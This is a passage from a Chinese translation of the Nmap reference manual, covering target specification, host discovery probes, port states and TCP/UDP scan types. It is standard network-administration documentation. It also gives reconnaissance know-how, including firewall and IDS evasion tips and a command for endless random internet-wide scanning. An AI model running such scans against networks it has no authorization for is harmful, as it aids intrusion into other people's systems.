output files    --resume &lt;filename&gt;: Resume an aborted scan    --stylesheet &lt;path/URL&gt;: XSL stylesheet to transform XML output to HTML    --no_stylesheet: Prevent Nmap from associating XSL stylesheet w/XML outputMISC:    -6: Enable IPv6 scanning    -A: Enables OS detection and Version detection    --datadir &lt;dirname&gt;: Specify custom Nmap data file location    --send-eth/--send-ip: Send packets using raw ethernet frames or IP packets    --privileged: Assume that the user is fully privileged    -V: Print version number    -h: Print this help summary page.EXAMPLES:    nmap -v -A scanme.nmap.org    nmap -v -sP 192.168.0.0/16 10.0.0.0/8    nmap -v -iR 10000 -P0 -p 80</code></pre><h1 id="目标说明"><a href="#目标说明" class="headerlink" title="目标说明"></a>目标说明</h1><p>除了选项，所有出现在Nmap命令行上的都被视为对目标主机的说明。 最简单的情况是指定一个目标IP地址或主机名。</p><p>有时候您希望扫描整个网络的相邻主机。为此，Nmap支持CIDR风格的地址。您可以附加 一个/<numbit>在一个IP地址或主机名后面， Nmap将会扫描所有和该参考IP地址具有<numbit>相同比特的所有IP地址或主机。 例如，192.168.10.0/24将会扫描192.168.10.0 (二进制格式: 11000000 10101000 00001010 00000000)和192.168.10.255 (二进制格式: 11000000 10101000 00001010 11111111)之间的256台主机。 192.168.10.40/24 将会做同样的事情。假设主机 scanme.nmap.org的IP地址是205.217.153.62， scanme.nmap.org/16 将扫描205.217.0.0和205.217.255.255之间的65,536 个IP地址。 所允许的最小值是/1， 这将会扫描半个互联网。最大值是/32，这将会扫描该主机或IP地址， 因为所有的比特都固定了。</numbit></numbit></p><p>CIDR标志位很简洁但有时候不够灵活。例如，您也许想要扫描 192.168.0.0/16，但略过任何以.0或者.255 结束的IP地址，因为它们通常是广播地址。 Nmap通过八位字节地址范围支持这样的扫描 您可以用逗号分开的数字或范围列表为IP地址的每个八位字节指定它的范围。 例如，192.168.0-255.1-254 将略过在该范围内以.0和.255结束的地址。 范围不必限于最后的8位：0-255.0-255.13.37 将在整个互联网范围内扫描所有以13.37结束的地址。 这种大范围的扫描对互联网调查研究也许有用。</p><p>IPv6地址只能用规范的IPv6地址或主机名指定。 CIDR 和八位字节范围不支持IPv6，因为它们对于IPv6几乎没什么用。</p><p>Nmap命令行接受多个主机说明，它们不必是相同类型。命令<strong>nmap scanme.nmap.org 192.168.0.0/8 10.0.0，1，3-7.0-255</strong>将和您预期的一样执行。</p><p>虽然目标通常在命令行指定，下列选项也可用来控制目标的选择：</p><p><strong>-iL<inputfilename>(从列表中输入)</inputfilename></strong></p><p>从 <em><inputfilename></inputfilename></em>中读取目标说明。在命令行输入 一堆主机名显得很笨拙，然而经常需要这样。 例如，您的DHCP服务器可能导出10,000个当前租约的列表，而您希望对它们进行 扫描。如果您不是使用未授权的静态IP来定位主机，或许您想要扫描所有IP地址。 只要生成要扫描的主机的列表，用-iL 把文件名作为选项传给Nmap。列表中的项可以是Nmap在 命令行上接受的任何格式(IP地址，主机名，CIDR，IPv6，或者八位字节范围)。 每一项必须以一个或多个空格，制表符或换行符分开。 如果您希望Nmap从标准输入而不是实际文件读取列表， 您可以用一个连字符(-)作为文件名。</p><p><strong>-iR<hostnum>(随机选择目标)</hostnum></strong></p><p>对于互联网范围内的调查和研究， 您也许想随机地选择目标。 <em><hostnum></hostnum></em>选项告诉 Nmap生成多少个IP。不合需要的IP如特定的私有，组播或者未分配的地址自动 略过。选项 0 意味着永无休止的扫描。记住，一些网管对于未授权的扫描可能会很感冒并加以抱怨。 使用该选项的后果自负! 如果在某个雨天的下午，您觉得实在无聊， 试试这个命令nmap -sS -PS80 -iR 0 -p 80随机地找一些网站浏览。</p><p><strong>–exclude<host1 [,host2][,host3],...="">(排除主机/网络)</host1></strong></p><p>如果在您指定的扫描范围有一些主机或网络不是您的目标， 那就用该选项加上以逗号分隔的列表排除它们。该列表用正常的Nmap语法， 因此它可以包括主机名，CIDR，八位字节范围等等。 当您希望扫描的网络包含执行关键任务的服务器，已知的对端口扫描反应强烈的 系统或者被其它人看管的子网时，这也许有用。</p><p><strong>–excludefile<excludefile>(排除文件中的列表)</excludefile></strong></p><p>这和–exclude 选项的功能一样，只是所排除的目标是用以 换行符，空格，或者制表符分隔的 <em><excludefile></excludefile></em>提供的，而不是在命令行上输入的。</p><h1 id="主机发现"><a href="#主机发现" class="headerlink" title="主机发现"></a>主机发现</h1><p>任何网络探测任务的最初几个步骤之一就是把一组IP范围(有时该范围是巨大的)缩小为 一列活动的或者您感兴趣的主机。扫描每个IP的每个端口很慢，通常也没必要。当然，什么样的主机令您感兴趣主要依赖于扫描的目的。网管也许只对运行特定服务的 主机感兴趣，而从事安全的人士则可能对一个马桶都感兴趣，只要它有IP地址:-)。一个系统管理员 也许仅仅使用Ping来定位内网上的主机，而一个外部入侵测试人员则可能绞尽脑汁用各种方法试图突破防火墙的封锁。</p><p>由于主机发现的需求五花八门，Nmap提供了一箩筐的选项来定制您的需求。 主机发现有时候也叫做ping扫描，但它远远超越用世人皆知的ping工具 发送简单的ICMP回声请求报文。用户完全可以通过使用列表扫描(-sL)或者 通过关闭ping (-P0)跳过ping的步骤，也可以使用多个端口把TCP SYN/ACK，UDP和ICMP 任意组合起来玩一玩。这些探测的目的是获得响应以显示某个IP地址是否是活动的(正在被某 主机或者网络设备使用)。 在许多网络上，在给定的时间，往往只有小部分的IP地址是活动的。 这种情况在基于RFC1918的私有地址空间如10.0.0.0/8尤其普遍。那个网络有16,000,000个IP，但我见过一些使用它的公司连1000台机器都没有。主机发现能够找到零星分布于IP地址海洋上的那些机器。</p><p>如果没有给出主机发现的选项，Nmap 就发送一个TCP ACK报文到80端口和一个ICMP回声请求到每台目标机器。 一个例外是ARP扫描用于局域网上的任何目标机器。对于非特权UNIX shell用户，使用connect()系统调用会发送一个SYN报文而不是ACK 这些默认行为和使用-PA -PE选项的效果相同。 扫描局域网时，这种主机发现一般够用了，但是对于安全审核，建议进行 更加全面的探测。</p><p>-P选项(用于选择 ping的类型)可以被结合使用。 您可以通过使用不同的TCP端口/标志位和ICMP码发送许多探测报文 来增加穿透防守严密的防火墙的机会。另外要注意的是即使您指定了其它 -P*选项，ARP发现(-PR)对于局域网上的 目标而言是默认行为，因为它总是更快更有效。</p><p>下列选项控制主机发现。</p><p><strong>-sL (列表扫描)</strong></p><p>列表扫描是主机发现的退化形式，它仅仅列出指定网络上的每台主机， 不发送任何报文到目标主机。默认情况下，Nmap仍然对主机进行反向域名解析以获取 它们的名字。简单的主机名能给出的有用信息常常令人惊讶。例如， fw.chi.playboy.com是花花公子芝加哥办公室的 防火墙。Nmap最后还会报告IP地址的总数。列表扫描可以很好的确保您拥有正确的目标IP。 如果主机的域名出乎您的意料，那么就值得进一步检查以防错误地扫描其它组织的网络。</p><p>既然只是打印目标主机的列表，像其它一些高级功能如端口扫描，操作系统探测或者Ping扫描 的选项就没有了。如果您希望关闭ping扫描而仍然执行这样的高级功能，请继续阅读关于 -P0选项的介绍。</p><p><strong>-sP (Ping扫描)</strong></p><p>该选项告诉Nmap仅仅 进行ping扫描 (主机发现)，然后打印出对扫描做出响应的那些主机。 没有进一步的测试 (如端口扫描或者操作系统探测)。 这比列表扫描更积极，常常用于 和列表扫描相同的目的。它可以得到些许目标网络的信息而不被特别注意到。 对于攻击者来说，了解多少主机正在运行比列表扫描提供的一列IP和主机名往往更有价值。</p><p>系统管理员往往也很喜欢这个选项。 它可以很方便地得出 网络上有多少机器正在运行或者监视服务器是否正常运行。常常有人称它为 地毯式ping，它比ping广播地址更可靠，因为许多主机对广播请求不响应。</p><p>-sP选项在默认情况下， 发送一个ICMP回声请求和一个TCP报文到80端口。如果非特权用户执行，就发送一个SYN报文 (用connect()系统调用)到目标机的80端口。 当特权用户扫描局域网上的目标机时，会发送ARP请求(-PR)， ，除非使用了–send-ip选项。 -sP选项可以和除-P0)之外的任何发现探测类型-P* 选项结合使用以达到更大的灵活性。 一旦使用了任何探测类型和端口选项，默认的探测(ACK和回应请求)就被覆盖了。 当防守严密的防火墙位于运行Nmap的源主机和目标网络之间时， 推荐使用那些高级选项。否则，当防火墙捕获并丢弃探测包或者响应包时，一些主机就不能被探测到。</p><p><strong>-P0 (无ping)</strong></p><p>该选项完全跳过Nmap发现阶段。 通常Nmap在进行高强度的扫描时用它确定正在运行的机器。 默认情况下，Nmap只对正在运行的主机进行高强度的探测如 端口扫描，版本探测，或者操作系统探测。用-P0禁止 主机发现会使Nmap对每一个指定的目标IP地址 进行所要求的扫描。所以如果在命令行指定一个B类目标地址空间(/16)， 所有 65,536 个IP地址都会被扫描。 -P0的第二个字符是数字0而不是字母O。 和列表扫描一样，跳过正常的主机发现，但不是打印一个目标列表， 而是继续执行所要求的功能，就好像每个IP都是活动的。</p><p><strong>-PS [portlist] (TCP SYN Ping)</strong></p><p>该选项发送一个设置了SYN标志位的空TCP报文。 默认目的端口为80 (可以通过改变nmap.h) 文件中的DEFAULT-TCP-PROBE-PORT值进行配置，但不同的端口也可以作为选项指定。 甚至可以指定一个以逗号分隔的端口列表(如 -PS22，23，25，80，113，1050，35000)， 在这种情况下，每个端口会被并发地扫描。</p><p>SYN标志位告诉对方您正试图建立一个连接。 通常目标端口是关闭的，一个RST (复位) 包会发回来。 如果碰巧端口是开放的，目标会进行TCP三步握手的第二步，回应 一个SYN/ACK TCP报文。然后运行Nmap的机器则会扼杀这个正在建立的连接， 发送一个RST而非ACK报文，否则，一个完全的连接将会建立。 RST报文是运行Nmap的机器而不是Nmap本身响应的，因为它对收到 的SYN/ACK感到很意外。</p><p>Nmap并不关心端口开放还是关闭。 无论RST还是SYN/ACK响应都告诉Nmap该主机正在运行。</p><p>在UNIX机器上，通常只有特权用户 root 能否发送和接收 原始的TCP报文。因此作为一个变通的方法，对于非特权用户， Nmap会为每个目标主机进行系统调用connect()，它也会发送一个SYN 报文来尝试建立连接。如果connect()迅速返回成功或者一个ECONNREFUSED 失败，下面的TCP堆栈一定已经收到了一个SYN/ACK或者RST，该主机将被 标志位为在运行。 如果连接超时了，该主机就标志位为down掉了。这种方法也用于IPv6 连接，因为Nmap目前还不支持原始的IPv6报文。</p><p><strong>-PA [portlist] (TCP ACK Ping)</strong></p><p>TCP ACK ping和刚才讨论的SYN ping相当类似。 也许您已经猜到了，区别就是设置TCP的ACK标志位而不是SYN标志位。 ACK报文表示确认一个建立连接的尝试，但该连接尚未完全建立。 所以远程主机应该总是回应一个RST报文， 因为它们并没有发出过连接请求到运行Nmap的机器，如果它们正在运行的话。</p><p>-PA选项使用和SYN探测相同的默认端口(80)，也可以 用相同的格式指定目标端口列表。如果非特权用户尝试该功能， 或者指定的是IPv6目标，前面说过的connect()方法将被使用。 这个方法并不完美，因为它实际上发送的是SYN报文，而不是ACK报文。</p><p>提供SYN和ACK两种ping探测的原因是使通过防火墙的机会尽可能大。 许多管理员会配置他们的路由器或者其它简单的防火墙来封锁SYN报文，除非 连接目标是那些公开的服务器像公司网站或者邮件服务器。 这可以阻止其它进入组织的连接，同时也允许用户访问互联网。 这种无状态的方法几乎不占用防火墙/路由器的资源，因而被硬件和软件过滤器 广泛支持。Linux Netfilter/iptables 防火墙软件提供方便的 –syn选项来实现这种无状态的方法。 当这样的无状态防火墙规则存在时，发送到关闭目标端口的SYN ping探测 (-PS) 很可能被封锁。这种情况下，ACK探测格外有闪光点，因为它正好利用了 这样的规则。</p><p>另外一种常用的防火墙用有状态的规则来封锁非预期的报文。 这一特性已开始只存在于高端防火墙，但是这些年类它越来越普遍了。 Linux Netfilter/iptables 通过 –state选项支持这一特性，它根据连接状态把报文 进行分类。SYN探测更有可能用于这样的系统，由于没头没脑的ACK报文 通常会被识别成伪造的而丢弃。解决这个两难的方法是通过即指定 -PS又指定-PA来即发送SYN又发送ACK。</p><p><strong>-PU [portlist] (UDP Ping)</strong></p><p>还有一个主机发现的选项是UDP ping，它发送一个空的(除非指定了–data-length UDP报文到给定的端口。端口列表的格式和前面讨论过的-PS和-PA选项还是一样。 如果不指定端口，默认是31338。该默认值可以通过在编译时改变nmap.h文件中的 DEFAULT-UDP-PROBE-PORT值进行配置。默认使用这样一个奇怪的端口是因为对开放端口 进行这种扫描一般都不受欢迎。</p><p>如果目标机器的端口是关闭的，UDP探测应该马上得到一个ICMP端口无法到达的回应报文。 这对于Nmap意味着该机器正在运行。 许多其它类型的ICMP错误，像主机/网络无法到达或者TTL超时则表示down掉的或者不可到达的主机。 没有回应也被这样解释。如果到达一个开放的端口，大部分服务仅仅忽略这个 空报文而不做任何回应。这就是为什么默认探测端口是31338这样一个 极不可能被使用的端口。少数服务如chargen会响应一个空的UDP报文， 从而向Nmap表明该机器正在运行。</p><p>该扫描类型的主要优势是它可以穿越只过滤TCP的防火墙和过滤器。 例如。我曾经有过一个Linksys BEFW11S4无线宽带路由器。默认情况下， 该设备对外的网卡过滤所有TCP端口，但UDP探测仍然会引发一个端口不可到达 的消息，从而暴露了它自己。</p><p><strong>-PE; -PP; -PM (ICMP Ping Types)</strong></p><p>除了前面讨论的这些不常见的TCP和UDP主机发现类型， Nmap也能发送世人皆知的ping 程序所发送的报文。Nmap发送一个ICMP type 8 (回声请求)报文到目标IP地址， 期待从运行的主机得到一个type 0 (回声响应)报文。 对于网络探索者而言，不幸的是，许多主机和 防火墙现在封锁这些报文，而不是按期望的那样响应， 参见<a href="http://www.rfc-editor.org/rfc/rfc1122.txt" target="_blank" rel="external">RFC 1122</a>。因此，仅仅ICMP扫描对于互联网上的目标通常是不够的。 但对于系统管理员监视一个内部网络，它们可能是实际有效的途径。 使用-PE选项打开该回声请求功能。</p><p>虽然回声请求是标准的ICMP ping查询， Nmap并不止于此。ICMP标准 (<a href="http://www.rfc-editor.org/rfc/rfc792.txt" target="_blank" rel="external">RFC 792</a>)还规范了时间戳请求，信息请求 request，和地址掩码请求，它们的代码分别是13，15和17。 虽然这些查询的表面目的是获取信息如地址掩码和当前时间， 它们也可以很容易地用于主机发现。 很简单，回应的系统就是在运行的系统。Nmap目前没有实现信息请求报文， 因为它们还没有被广泛支持。RFC 1122 坚持 “主机不应该实现这些消息”。 时间戳和地址掩码查询可以分别用-PP和-PM选项发送。 时间戳响应(ICMP代码14)或者地址掩码响应(代码18)表示主机在运行。 当管理员特别封锁了回声请求报文而忘了其它ICMP查询可能用于 相同目的时，这两个查询可能很有价值。</p><p><strong>-PR (ARP Ping)</strong></p><p>最常见的Nmap使用场景之一是扫描一个以太局域网。在大部分局域网上，特别是那些使用基于 RFC1918私有地址范围的网络，在一个给定的时间绝大部分 IP地址都是不使用的。 当Nmap试图发送一个原始IP报文如ICMP回声请求时， 操作系统必须确定对应于目标IP的硬件地址(ARP)，这样它才能把以太帧送往正确的地址。 这一般比较慢而且会有些问题，因为操作系统设计者认为一般不会在短时间内 对没有运行的机器作几百万次的ARP请求。</p><p>当进行ARP扫描时，Nmap用它优化的算法管理ARP请求。当它收到响应时，Nmap甚至不需要担心基于IP的ping报文，既然它已经知道该主机正在运行了。 这使得ARP扫描比基于IP的扫描更快更可靠。 所以默认情况下，如果Nmap发现目标主机就在它所在的局域网上，它会进行ARP扫描。即使指定了不同的ping类型(如 -PI或者 -PS) ，Nmap也会对任何相同局域网上的目标机使用ARP。 如果您真的不想要ARP扫描，指定 –send-ip。</p><p><strong>-n (不用域名解析)</strong></p><p>告诉Nmap 永不对它发现的活动IP地址进行反向域名解析。既然DNS一般比较慢，这可以让事情更快些。</p><p><strong>-R (为所有目标解析域名)</strong></p><p>告诉Nmap 永远 对目标IP地址作反向域名解析。 一般只有当发现机器正在运行时才进行这项操作。</p><p><strong>–system-dns (使用系统域名解析器)</strong></p><p>默认情况下，Nmap通过直接发送查询到您的主机上配置的域名服务器 来解析域名。为了提高性能，许多请求 (一般几十个 ) 并发执行。如果您希望使用系统自带的解析器，就指定该选项 (通过getnameinfo()调用一次解析一个IP)。除非Nmap的DNS代码有bug–如果是这样，请联系我们。 一般不使用该选项，因为它慢多了。系统解析器总是用于IPv6扫描。</p><h1 id="端口扫描基础"><a href="#端口扫描基础" class="headerlink" title="端口扫描基础"></a>端口扫描基础</h1><p>虽然Nmap这些年来功能越来越多， 它也是从一个高效的端口扫描器开始的，并且那仍然是它的核心功能。 nmap<target>这个简单的命令扫描主机<target>上的超过 1660个TCP端口。 。许多传统的端口扫描器只列出所有端口是开放还是关闭的， Nmap的信息粒度比它们要细得多。 它把端口分成六个状态: open(开放的)， closed(关闭的)，filtered(被过滤的)， unfiltered(未被过滤的)， open|filtered(开放或者被过滤的)，或者 closed|filtered(关闭或者被过滤的)。</target></target></p><p>这些状态并非端口本身的性质，而是描述Nmap怎样看待它们。例如， 对于同样的目标机器的135/tcp端口，从同网络扫描显示它是开放的，而跨网络作完全相同的扫描则可能显示它是 filtered(被过滤的)。</p><p>Nmap所识别的6个端口状态：</p><p><strong>open(开放的)</strong></p><p>应用程序正在该端口接收TCP 连接或者UDP报文。发现这一点常常是端口扫描 的主要目标。安全意识强的人们知道每个开放的端口 都是攻击的入口。攻击者或者入侵测试者想要发现开放的端口。 而管理员则试图关闭它们或者用防火墙保护它们以免妨碍了合法用户。 非安全扫描可能对开放的端口也感兴趣，因为它们显示了网络上那些服务可供使用。</p><p><strong>closed(关闭的)</strong></p><p>关闭的端口对于Nmap也是可访问的(它接受Nmap的探测报文并作出响应)， 但没有应用程序在其上监听。 它们可以显示该IP地址上(主机发现，或者ping扫描)的主机正在运行up 也对部分操作系统探测有所帮助。 因为关闭的关口是可访问的，也许过会儿值得再扫描一下，可能一些又开放了。 系统管理员可能会考虑用防火墙封锁这样的端口。 那样他们就会被显示为被过滤的状态，下面讨论。</p><p><strong>filtered(被过滤的)</strong></p><p>由于包过滤阻止探测报文到达端口， Nmap无法确定该端口是否开放。过滤可能来自专业的防火墙设备，路由器规则 或者主机上的软件防火墙。这样的端口让攻击者感觉很挫折，因为它们几乎不提供 任何信息。有时候它们响应ICMP错误消息如类型3代码13 (无法到达目标: 通信被管理员禁止)，但更普遍的是过滤器只是丢弃探测帧， 不做任何响应。 这迫使Nmap重试若干次以访万一探测包是由于网络阻塞丢弃的。 这使得扫描速度明显变慢。</p><p><strong>unfiltered(未被过滤的)</strong></p><p>未被过滤状态意味着端口可访问，但Nmap不能确定它是开放还是关闭。 只有用于映射防火墙规则集的ACK扫描才会把端口分类到这种状态。 用其它类型的扫描如窗口扫描，SYN扫描，或者FIN扫描来扫描未被过滤的端口可以帮助确定 端口是否开放。</p><p><strong>open|filtered(开放或者被过滤的)</strong></p><p>当无法确定端口是开放还是被过滤的，Nmap就把该端口划分成 这种状态。开放的端口不响应就是一个例子。没有响应也可能意味着报文过滤器丢弃 了探测报文或者它引发的任何响应。因此Nmap无法确定该端口是开放的还是被过滤的。 UDP，IP协议， FIN，Null，和Xmas扫描可能把端口归入此类。</p><p><strong>closed|filtered(关闭或者被过滤的)</strong></p><p>该状态用于Nmap不能确定端口是关闭的还是被过滤的。 它只可能出现在IPID Idle扫描中。</p><h1 id="端口扫描技术"><a href="#端口扫描技术" class="headerlink" title="端口扫描技术"></a>端口扫描技术</h1><p>作为一个修车新手，我可能折腾几个小时来摸索怎样把基本工具(锤子，胶带，扳子等) 用于手头的任务。当我惨痛地失败，把我的老爷车拖到一个真正的技师那儿的时候 ，他总是在他的工具箱里翻来翻去，直到拽出一个完美的工具然后似乎不费吹灰之力搞定它。 端口扫描的艺术和这个类似。专家理解成打的扫描技术，选择最适合的一种 (或者组合)来完成给定的 任务。 另一方面，没有经验的用户和刚入门者总是用默认的SYN扫描解决每个问题。 既然Nmap是免费的，掌握端口扫描的唯一障碍就是知识。这当然是汽车世界所不能比的， 在那里，可能需要高超的技巧才能确定您需要一个压杆弹簧压缩机，接着您还得为它付数千美金。</p><p>大部分扫描类型只对特权用户可用。 这是因为他们发送接收原始报文，这在Unix系统需要root权限。 在Windows上推荐使用administrator账户，但是当WinPcap已经被加载到操作系统时， 非特权用户也可以正常使用Nmap。当Nmap在1997年发布时，需要root权限是一个严重的 局限，因为很多用户只有共享的shell账户。现在，世界变了，计算机便宜了，更多人拥有互联网连接 ，桌面UNIX系统 (包括Linux和MAC OS X)很普遍了。Windows版本的Nmap现在也有了，这使它可以运行在更多的桌面上。 由于所有这些原因，用户不再需要用有限的共享shell账户运行Nmap。 这是很幸运的，因为特权选项让Nmap强大得多也灵活得多。</p><p>虽然Nmap努力产生正确的结果，但请记住所有结果都是基于目标机器(或者它们前面的防火墙)返回的报文的。 。这些主机也许是不值得信任的，它们可能响应以迷惑或误导Nmap的报文。 更普遍的是非RFC兼容的主机以不正确的方式响应Nmap探测。FIN，Null和Xmas扫描 特别容易遇到这个问题。这些是特定扫描类型的问题，因此我们在个别扫描类型里讨论它们。</p><p>这一节讨论Nmap支持的大约十几种扫描技术。 一般一次只用一种方法， 除了UDP扫描(-sU)可能和任何一种TCP扫描类型结合使用。 友情提示一下，端口扫描类型的选项格式是-s<c>， 其中<c>是个显眼的字符，通常是第一个字符。 一个例外是deprecated FTP bounce扫描(-b)。默认情况下，Nmap执行一个 SYN扫描，但是如果用户没有权限发送原始报文(在UNIX上需要root权限)或者如果指定的是IPv6目标，Nmap调用connect()。 本节列出的扫描中，非特权用户只能执行connect()和ftp bounce扫描。</c></c></p><p><strong>-sS (TCP SYN扫描)</strong></p><p>SYN扫描作为默认的也是最受欢迎的扫描选项，是有充分理由的。 它执行得很快，在一个没有入侵防火墙的快速网络上，每秒钟可以扫描数千个 端口。 SYN扫描相对来说不张扬，不易被注意到，因为它从来不完成TCP连接。 它也不像Fin/Null/Xmas，Maimon和Idle扫描依赖于特定平台，而可以应对任何兼容的 TCP协议栈。 它还可以明确可靠地区分open(开放的)， closed(关闭的)，和filtered(被过滤的) 状态</p><p>它常常被称为半开放扫描， 因为它不打开一个完全的TCP连接。它发送一个SYN报文， 就像您真的要打开一个连接，然后等待响应。 SYN/ACK表示端口在监听 (开放)，而 RST (复位)表示没有监听者。如果数次重发后仍没响应， 该端口就被标记为被过滤。如果收到ICMP不可到达错误 (类型3，代码1，2，3，9，10，或者13)，该端口也被标记为被过滤。</p><p><strong>-sT (TCP connect()扫描)</strong></p><p>当SYN扫描不能用时，CP Connect()扫描就是默认的TCP扫描。 当用户没有权限发送原始报文或者扫描IPv6网络时，就是这种情况。 Instead of writing raw packets as most other scan types do，Nmap通过创建connect() 系统调用要求操作系统和目标机以及端口建立连接，而不像其它扫描类型直接发送原始报文。 这是和Web浏览器，P2P客户端以及大多数其它网络应用程序用以建立连接一样的 高层系统调用。它是叫做Berkeley Sockets API编程接口的一部分。Nmap用 该API获得每个连接尝试的状态信息，而不是读取响应的原始报文。</p><p>当SYN扫描可用时，它通常是更好的选择。因为Nmap对高层的 connect()调用比对原始报文控制更少， 所以前者效率较低。 该系统调用完全连接到开放的目标端口而不是像SYN扫描进行 半开放的复位。这不仅花更长时间，需要更多报文得到同样信息，目标机也更可能 记录下连接。IDS(入侵检测系统)可以捕获两者，但大部分机器没有这样的警报系统。 当Nmap连接，然后不发送数据又关闭连接， 许多普通UNIX系统上的服务会在syslog留下记录，有时候是一条加密的错误消息。 此时，有些真正可怜的服务会崩溃，虽然这不常发生。如果管理员在日志里看到来自同一系统的 一堆连接尝试，她应该知道她的系统被扫描了。</p><p>-<strong>sU (UDP扫描)</strong></p><p>虽然互联网上很多流行的服务运行在TCP 协议上，<a href="http://www.rfc-editor.org/rfc/rfc768.txt" target="_blank" rel="external">UDP服务</a>也不少。 DNS，SNMP，和DHCP (注册的端口是53，161/162，和67/68)是最常见的三个。 因为UDP扫描一般较慢，比TCP更困难，一些安全审核人员忽略这些端口。 这是一个错误，因为可探测的UDP服务相当普遍，攻击者当然不会忽略整个协议。 所幸，Nmap可以帮助记录并报告UDP端口。</p><p>UDP扫描用-sU选项激活。它可以和TCP扫描如 SYN扫描 (-sS)结合使用来同时检查两种协议。</p><p>UDP扫描发送空的(没有数据)UDP报头到每个目标端口。 如果返回ICMP端口不可到达错误(类型3，代码3)， 该端口是closed(关闭的)。 其它ICMP不可到达错误(类型3， 代码1，2，9，10，或者13)表明该端口是filtered(被过滤的)。 偶尔地，某服务会响应一个UDP报文，证明该端口是open(开放的)。 如果几次重试后还没有响应，该端口就被认为是 open|filtered(开放|被过滤的)。 这意味着该端口可能是开放的，也可能包过滤器正在封锁通信。 可以用版本扫描(-sV)帮助区分真正的开放端口和被过滤的端口。</p><p>UDP扫描的巨大挑战是怎样使它更快速。 开放的和被过滤的端口很少响应，让Nmap超时然后再探测，以防探测帧或者 响应丢失。关闭的端口常常是更大的问题。 它们一般发回一个ICMP端口无法到达错误。但是不像关闭的TCP端口响应SYN或者Connect 扫描所发送的RST报文，许多主机在默认情况下限制ICMP端口不可到达消息。 Linux和Solaris对此特别严格。例如， Linux 2.4.20内核限制一秒钟只发送一条目标不可到达消息 (见net/ipv4/icmp。c)。</p><p>Nmap探测速率限制并相应地减慢来避免用那些目标机会丢弃的无用报文来阻塞 网络。不幸的是，Linux式的一秒钟一个报文的限制使65,536个端口的扫描要花 18小时以上。加速UDP扫描的方法包括并发扫描更多的主机，先只对主要端口进行快速 扫描，从防火墙后面扫描，使用–host-timeout跳过慢速的 主机。</p><p><strong>-sN; -sF; -sX (TCP Null，FIN，and Xmas扫描)</strong></p><p>这三种扫描类型 (甚至用下一节描述的 –scanflags 选项的更多类型) 在<a href="http://www.rfc-editor.org/rfc/rfc793.txt" target="_blank" rel="external">TCP RFC</a>中发掘了一个微妙的方法来区分open(开放的)和 closed(关闭的)端口。第65页说“如果 [目标]端口状态是关闭的…. 进入的不含RST的报文导致一个RST响应。” 接下来的一页 讨论不设置SYN，RST，或者ACK位的报文发送到开放端口: “理论上，这不应该发生，如果您确实收到了，丢弃该报文，返回。 ”</p><p>如果扫描系统遵循该RFC，当端口关闭时，任何不包含SYN，RST，或者ACK位的报文会导致 一个RST返回，而当端口开放时，应该没有任何响应。只要不包含SYN，RST，或者ACK， 任何其它三种(FIN，PSH，and URG)的组合都行。Nmap有三种扫描类型利用这一点：</p><p><strong>Null扫描 (-sN)</strong></p><p>不设置任何标志位(tcp标志头是0)</p><p><strong>FIN扫描 (-sF)</strong></p><p>只设置TCP FIN标志位。</p><p><strong>Xmas扫描 (-sX)</strong></p><p>设置FIN，PSH，和URG标志位，就像点亮圣诞树上所有的灯一样。</p><p>除了探测报文的标志位不同，这三种扫描在行为上完全一致。 如果收到一个RST报文，该端口被认为是 closed(关闭的)，而没有响应则意味着 端口是open|filtered(开放或者被过滤的)。 如果收到ICMP不可到达错误(类型 3，代号 1，2，3，9，10，或者13)，该端口就被标记为 被过滤的。</p><p>这些扫描的关键优势是它们能躲过一些无状态防火墙和报文过滤路由器。 另一个优势是这些扫描类型甚至比SYN扫描还要隐秘一些。但是别依赖它 – 多数 现代的IDS产品可以发现它们。一个很大的不足是并非所有系统都严格遵循RFC 793。 许多系统不管端口开放还是关闭，都响应RST。 这导致所有端口都标记为closed(关闭的)。 这样的操作系统主要有Microsoft Windows，许多Cisco设备，BSDI，以及IBM OS/400。 但是这种扫描对多数UNIX系统都能工作。这些扫描的另一个不足是 它们不能辨别open(开放的)端口和一些特定的 filtered(被过滤的)端口，从而返回 open|filtered(开放或者被过滤的)。</p><p><strong>-sA (TCP ACK扫描)</strong></p><p>这种扫描与目前为止讨论的其它扫描的不同之处在于 它不能确定open(开放的)或者 open|filtered(开放或者过滤的))端口。 它用于发现防火墙规则，确定它们是有状态的还是无状态的，哪些端口是被过滤的。</p><p>ACK扫描探测报文只设置ACK标志位(除非您使用 –scanflags)。当扫描未被过滤的系统时， open(开放的)和closed(关闭的) 端口 都会返回RST报文。Nmap把它们标记为 unfiltered(未被过滤的)，意思是 ACK报文不能到达，但至于它们是open(开放的)或者 closed(关闭的) 无法确定。不响应的端口 或者发送特定的ICMP错误消息(类型3，代号1，2，3，9，10， 或者13)的端口，标记为 filtered(被过滤的)。</p><p><strong>-sW (TCP窗口扫描)</strong></p><p>除了利用特定系统的实现细节来区分开放端口和关闭端口，当收到RST时不总是打印unfiltered， 窗口扫描和ACK扫描完全一样。 它通过检查返回的RST报文的TCP窗口域做到这一点。 在某些系统上，开放端口用正数表示窗口大小(甚至对于RST报文) 而关闭端口的窗口大小为0。因此，当收到RST时，窗口扫描不总是把端口标记为 unfiltered， 而是根据TCP窗口值是正数还是0，分别把端口标记为open或者 closed</p><p>该扫描依赖于互联网上少数系统的实现细节， 因此您不能永远相信它。不支持它的系统会通常返回所有端口closed。 当然，一台机器没有开放端口也是有可能的。 如果大部分被扫描的端口是 closed，而一些常见的端口 (如 22， 25，53) 是 filtered，该系统就非常可疑了。 偶尔地，系统甚至会显示恰恰相反的行为。 如果您的扫描显示1000个开放的端口和3个关闭的或者被过滤的端口， 那么那3个很可能也是开放的端口。</p><p><strong>-sM (TCP Maimon扫描)</strong></p><p>Maimon扫描是用它的发现者Uriel Maimon命名的。他在 Phrack Magazine issue #49 (November 1996)中描述了这一技术。 Nmap在两期后加入了这一技术。 这项技术和Null，FIN，以及Xmas扫描完全一样，除了探测报文是FIN/ACK。 根据RFC 793 (TCP)，无论端口开放或者关闭，都应该对这样的探测响应RST报文。 然而，Uriel注意到如果端口开放，许多基于BSD的系统只是丢弃该探测报文。</p><p><strong>–scanflags (定制的TCP扫描)</strong></p><p>真正的Nmap高级用户不需要被这些现成的扫描类型束缚。 –scanflags选项允许您通过指定任意TCP标志位来设计您自己的扫描。 让您的创造力流动，躲开那些仅靠本手册添加规则的入侵检测系统！</p><p>–scanflags选项可以是一个数字标记值如9 (PSH和FIN)， 但使用字符名更容易些。 只要是URG， ACK，PSH， RST，SYN，and FIN的任何组合就行。例如，–scanflags URGACKPSHRSTSYNFIN设置了所有标志位，但是这对扫描没有太大用处。 